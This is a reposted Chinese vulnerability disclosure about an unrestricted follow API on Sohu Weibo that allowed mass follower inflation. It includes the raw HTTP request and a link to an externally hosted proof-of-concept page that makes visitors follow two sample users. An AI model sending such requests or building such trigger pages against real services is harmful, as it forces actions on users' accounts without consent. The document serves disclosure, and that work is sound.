网站地图    收藏   

主页 > 后端 > 网站安全 >

搜狐微博任意批量无限制刷粉 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 1、首先存在缺陷的地方是新人激活的那个页面,因为没有保留截图,你们就自己测试吧。接口我贴出来。POST follow addfollows HTTP 1 1Host: t sohu comProxy-Connection: keep-aliveContent-Length: 353Acc...

1、首先存在缺陷的地方是新人激活的那个页面,因为没有保留截图,你们就自己测试吧。
 
接口我贴出来。
 
POST /follow/addfollows HTTP/1.1

Host: t.sohu.com

Proxy-Connection: keep-alive

Content-Length: 353

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://t.sohu.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://t.sohu.com/regist/recommends?interest=zhuanjia,meitu,shishang

Accept-Encoding: gzip,deflate,sdch

Accept-Language: en-US,en;q=0.8,it;q=0.6,ja;q=0.4,zh-TW;q=0.2

Cookie: XXXXXXXXXXXXXXXXXXXXXXX



act=follow&friendids=uids

 

 
 
 
 
2、这里没有做任何限制,so,刷粉你们不介意的对吧。
 
这里我们选取任意两个用户,
 
http://t.sohu.com/people?uid=998946
 
http://t.sohu.com/people?uid=549889
 
ok,直接上图。
 
 

 
3、最后,知道你们时间宝贵,为了方便你们审核,我还搞了个poc,
 
访问即可触发,关注人还是例子中的两个人。
 
 
 
http://m4sk.sinaapp.com/sohu.php

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论